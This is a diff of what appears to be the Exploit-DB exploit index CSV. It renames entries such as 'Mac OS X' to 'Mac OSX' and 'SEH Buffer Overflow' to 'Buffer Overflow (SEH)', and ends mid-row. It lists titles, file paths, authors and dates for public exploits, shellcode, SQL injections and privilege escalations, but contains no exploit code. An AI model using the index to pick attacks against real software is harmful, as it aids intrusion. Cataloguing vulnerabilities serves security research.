38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 -38028,platforms/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local SEH Buffer Overflow",2015-08-31,"Robbie Corley",windows,dos,0 +38028,platforms/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH)",2015-08-31,"Robbie Corley",windows,dos,0 38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Authentication Bypass",2015-08-31,smash,hardware,webapps,80 38030,platforms/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps,0 38031,platforms/windows/dos/38031.pl,"Microsoft Office 2007 - msxml5.dll Crash (PoC)",2015-08-31,"Mohammad Reza Espargham",windows,dos,0 38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 -38036,platforms/osx/local/38036.rb,"Apple Mac OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 +38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 @@ -34381,7 +34387,7 @@ id,file,description,date,author,platform,type,port 38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Parameter Open redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 38064,platforms/php/webapps/38064.txt,"WordPress CStar Design Theme - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 -38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 +38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80 38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Directory Traversal",2015-09-02,HaHwul,php,webapps,80 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash (PoC)",2015-09-02,"Meisam Monsef",windows,dos,21 @@ -34405,8 +34411,8 @@ id,file,description,date,author,platform,type,port 38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 -38136,platforms/osx/local/38136.txt,"Apple Mac OS X Install.Framework - SUID root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 -38137,platforms/osx/local/38137.txt,"Apple Mac OS X Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0 +38136,platforms/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 +38137,platforms/osx/local/38137.txt,"Apple Mac OSX Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy - Password Change Command Injection",2015-09-07,Metasploit,linux,remote,10443 @@ -34428,9 +34434,9 @@ id,file,description,date,author,platform,type,port 38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 -38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 +38124,platforms/android/remote/38124.py,"Android (Stagefright) - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 38125,platforms/php/dos/38125.txt,"PHP - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 -38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 +38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 38127,platforms/php/webapps/38127.php,"PHP - cgimode fpm writeprocmemfile Bypass disable function demo",2015-09-10,ylbhz,php,webapps,0 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 @@ -34440,11 +34446,11 @@ id,file,description,date,author,platform,type,port 38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38138,platforms/osx/local/38138.txt,"Apple Mac OS X - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 +38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition - Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework - search q Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 -38142,platforms/php/webapps/38142.txt,"Hero Framework - users/login username Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 +38142,platforms/php/webapps/38142.txt,"Hero Framework - users/login 'Username' Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 38143,platforms/php/webapps/38143.txt,"cPanel - 'account' Parameter Cross-Site Scripting",2012-12-24,"Rafay Baloch",php,webapps,0 38144,platforms/php/webapps/38144.txt,"City Reviewer - 'search.php' Script SQL Injection",2012-12-22,3spi0n,php,webapps,0 38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389 @@ -34486,10 +34492,10 @@ id,file,description,date,author,platform,type,port 38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38183,platforms/php/webapps/38183.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 38184,platforms/php/webapps/38184.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 -38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 +38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0 38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 -38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 +38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0 38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80 38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80 @@ -34509,7 +34515,7 @@ id,file,description,date,author,platform,type,port 38208,platforms/multiple/dos/38208.py,"Colloquy - Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin - 'filename_1' Parameter Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - Cross-Site Request Forgery Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 -38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted File Upload",2015-09-22,rTheory,php,webapps,80 +38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted Arbitrary File Upload",2015-09-22,rTheory,php,webapps,80 38258,platforms/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,ios,webapps,8000 38213,platforms/php/webapps/38213.txt,"FAROL - SQL Injection",2015-09-16,"Thierry Fernandes Faria",php,webapps,80 38214,platforms/windows/dos/38214.txt,"Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0 @@ -34555,8 +34561,8 @@ id,file,description,date,author,platform,type,port 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos,0 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 38261,platforms/xml/webapps/38261.txt,"SAP NetWeaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",xml,webapps,0 -38262,platforms/osx/dos/38262.txt,"Apple Mac OS X Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities",2015-09-22,"Google Security Research",osx,dos,0 -38263,platforms/osx/dos/38263.txt,"Apple Mac OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0 +38262,platforms/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities",2015-09-22,"Google Security Research",osx,dos,0 +38263,platforms/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0 38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0 38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows - Kernel DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 @@ -34564,10 +34570,10 @@ id,file,description,date,author,platform,type,port 38268,platforms/win_x86/dos/38268.txt,"Microsoft Windows - Kernel Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows - Kernel HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows - Kernel win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows - Kernel SURFOBJ NULL Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows - Kernel SURFOBJ Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 38272,platforms/windows/dos/38272.txt,"Microsoft Windows - Kernel Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0 38273,platforms/win_x86/dos/38273.txt,"Microsoft Windows - Kernel WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38274,platforms/win_x86/dos/38274.txt,"Microsoft Windows - Kernel NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38274,platforms/win_x86/dos/38274.txt,"Microsoft Windows - Kernel Null Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 38275,platforms/win_x86/dos/38275.txt,"Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos,0 38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows - Kernel FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows - Kernel bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 @@ -34633,7 +34639,7 @@ id,file,description,date,author,platform,type,port 38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80 38340,platforms/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",windows,remote,21 38341,platforms/windows/remote/38341.py,"BisonWare BisonFTP Server 3.5 - Directory Traversal",2015-09-28,"Jay Turla",windows,remote,21 -38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Include",2015-09-28,Vulnerability-Lab,ios,webapps,8080 +38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Inclusion",2015-09-28,Vulnerability-Lab,ios,webapps,8080 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate JavaScript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 @@ -34663,7 +34669,7 @@ id,file,description,date,author,platform,type,port 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection",2015-10-01,neom22,hardware,webapps,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 -38371,platforms/osx/local/38371.py,"Apple Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 +38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 38372,platforms/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id - HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 38374,platforms/php/webapps/38374.txt,"SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 @@ -34676,7 +34682,7 @@ id,file,description,date,author,platform,type,port 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 38384,platforms/windows/remote/38384.txt,"Avast AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 -38385,platforms/php/webapps/38385.txt,"KindEditor - Multiple Remote File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 +38385,platforms/php/webapps/38385.txt,"KindEditor - Multiple Arbitrary File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 38386,platforms/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,php,webapps,0 38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote,0 38388,platforms/windows/remote/38388.txt,"QlikView - '.qvw' File Remote Integer Overflow",2013-03-13,"A. Antukh",windows,remote,0 @@ -34711,7 +34717,7 @@ id,file,description,date,author,platform,type,port 38420,platforms/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 38422,platforms/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 -38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter - SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0 +38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter - Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",windows,local,0 38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - (came_from) HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 38425,platforms/php/webapps/38425.txt,"PHP Address Book - /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38426,platforms/php/webapps/38426.txt,"PHP Address Book - /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 @@ -34722,7 +34728,7 @@ id,file,description,date,author,platform,type,port 38431,platforms/php/webapps/38431.txt,"PHP Address Book - /addressbook/register/router.php BasicLogin Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38432,platforms/php/webapps/38432.txt,"PHP Address Book - /addressbook/register/traffic.php var Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38433,platforms/php/webapps/38433.txt,"PHP Address Book - /addressbook/register/user_add_save.php email Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38434,platforms/php/webapps/38434.txt,"PHP Address Book - /addressbook/register/checklogin.php username Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38434,platforms/php/webapps/38434.txt,"PHP Address Book - /addressbook/register/checklogin.php 'Username' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38435,platforms/php/webapps/38435.txt,"PHP Address Book - /addressbook/register/admin_index.php q Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 @@ -34734,13 +34740,13 @@ id,file,description,date,author,platform,type,port 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0 -38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 +38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution",2015-10-14,blasty,multiple,remote,0 38455,platforms/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0 -38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0 +38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (SEH)",2015-10-14,ArminCyber,windows,local,0 38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0 38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter Cross-Site Scripting",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 38477,platforms/php/webapps/38477.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter SQL Injection",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 @@ -34749,7 +34755,7 @@ id,file,description,date,author,platform,type,port 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0 38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0 38460,platforms/jsp/webapps/38460.txt,"jPlayer - 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 -38461,platforms/java/webapps/38461.txt,"Hero Framework - /users/login username Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 +38461,platforms/java/webapps/38461.txt,"Hero Framework - /users/login 'Username' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 38462,platforms/java/webapps/38462.txt,"Hero Framework - /users/forgot_password error Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0 @@ -34787,7 +34793,7 @@ id,file,description,date,author,platform,type,port 38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 - /apply.cgi Multiple Parameter Cross-Site Scripting",2013-04-27,"Carl Benedict",hardware,remote,0 38502,platforms/php/webapps/38502.txt,"Getsimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0 38503,platforms/php/webapps/38503.txt,"Getsimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0 -38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - SEH Over-Write Exploit",2015-10-21,Un_N0n,windows,local,0 +38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0 38505,platforms/php/remote/38505.rb,"Zpanel - Remote Unauthenticated Remote Code Execution",2015-10-21,Metasploit,php,remote,0 38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 @@ -34820,7 +34826,7 @@ id,file,description,date,author,platform,type,port 38538,platforms/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos,0 38644,platforms/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,jsp,webapps,0 -38540,platforms/osx/local/38540.rb,"Apple Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 +38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38541,platforms/php/remote/38541.rb,"Th3 MMA - mma.php Backdoor Arbitrary File Upload",2015-10-27,Metasploit,php,remote,80 38543,platforms/php/webapps/38543.txt,"PHP4dvd - 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix - Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 @@ -34931,8 +34937,8 @@ id,file,description,date,author,platform,type,port 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 38656,platforms/php/webapps/38656.html,"PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Persistent Cross-Site Scripting",2015-11-09,Nu11By73,hardware,webapps,0 -39374,platforms/osx/dos/39374.c,"Apple Mac OS X - Kernel IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 +39374,platforms/osx/dos/39374.c,"Apple Mac OSX - Kernel IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,windows,dos,0 38660,platforms/php/remote/38660.rb,"WordPress Ajax Load More 2.8.1.1 Plugin - PHP Upload",2015-11-09,Metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds 